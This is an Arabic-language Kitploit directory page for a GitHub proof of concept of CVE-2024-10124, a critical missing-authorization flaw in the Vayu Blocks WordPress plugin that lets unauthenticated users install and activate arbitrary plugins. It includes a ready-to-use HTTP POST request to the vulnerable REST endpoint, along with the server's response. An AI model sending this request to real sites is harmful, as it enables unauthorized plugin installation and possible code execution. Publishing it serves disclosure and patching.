Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-10124
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-10124

CVE-2024-10124

Vayu Blocks – Gutenberg Blocks لووردبريس وووكومرس <= 1.1.1 - نقص التصريح يسمح بتثبيت/تفعيل إضافات عشوائية غير موثقة

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10124

Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - ثغرة في التحقق من الصلاحية تؤدي إلى تثبيت/تفعيل إضافات تعسفي غير مصادق عليه

الوصف

إضافة Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce لووردبريس عرضة للتثبيت والتفعيل التعسفي غير المصرح به للإضافات بسبب عدم وجود فحص للقدرة على دالة tp_install() في جميع الإصدارات حتى 1.1.1 بما في ذلك. وهذا يجعل من الممكن للمهاجمين غير المصادق عليهم تثبيت وتفعيل إضافات تعسفية يمكن استغلالها لتحقيق تنفيذ أكواد عن بُعد إذا تم تثبيت وتفعيل إضافة أخرى ضعيفة. تم تصحيح هذه الثغرة جزئيًا في الإصدار 1.1.1.

التفاصيل

  • النوع: إضافة
  • الاسم المختصر: vayu-blocks
  • الإصدار المتأثر: 1.1.1
  • درجة CVSS: 9.8
  • تصنيف CVSS: حرج
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-10124
  • الحالة: نشط

POC

root@kitploit:~
POST /wp-json/ai/v1/vayu-site-builder HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 347


{
    "params": {
        "plugin": {
            "akismet": "Akismet Anti-Spam"
        },
        "allPlugins": [
            {
                "akismet": "akismet/akismet.php"
            }
        ],
        "themeSlug": "",
        "proThemePlugin": "",
        "templateType": "free",
        "tmplFreePro": "plugin"
    }
}

يجب أن يُرجع رابط موقعك.

root@kitploit:~
HTTP/2 200 OK
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: POST
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json; charset=UTF-8
Date: Thu, 12 Dec 2024 15:12:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <https://wp-dev.ddev.site/wp-json/>; rel="https://api.w.org/"
Pragma: no-cache
Server: nginx
Set-Cookie: PHPSESSID=95f3c834be0cac72019468ca39e71fa9; path=/
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex

"\"https:\\\/\\\/wp-dev.ddev.site\""
تنزيل الأداة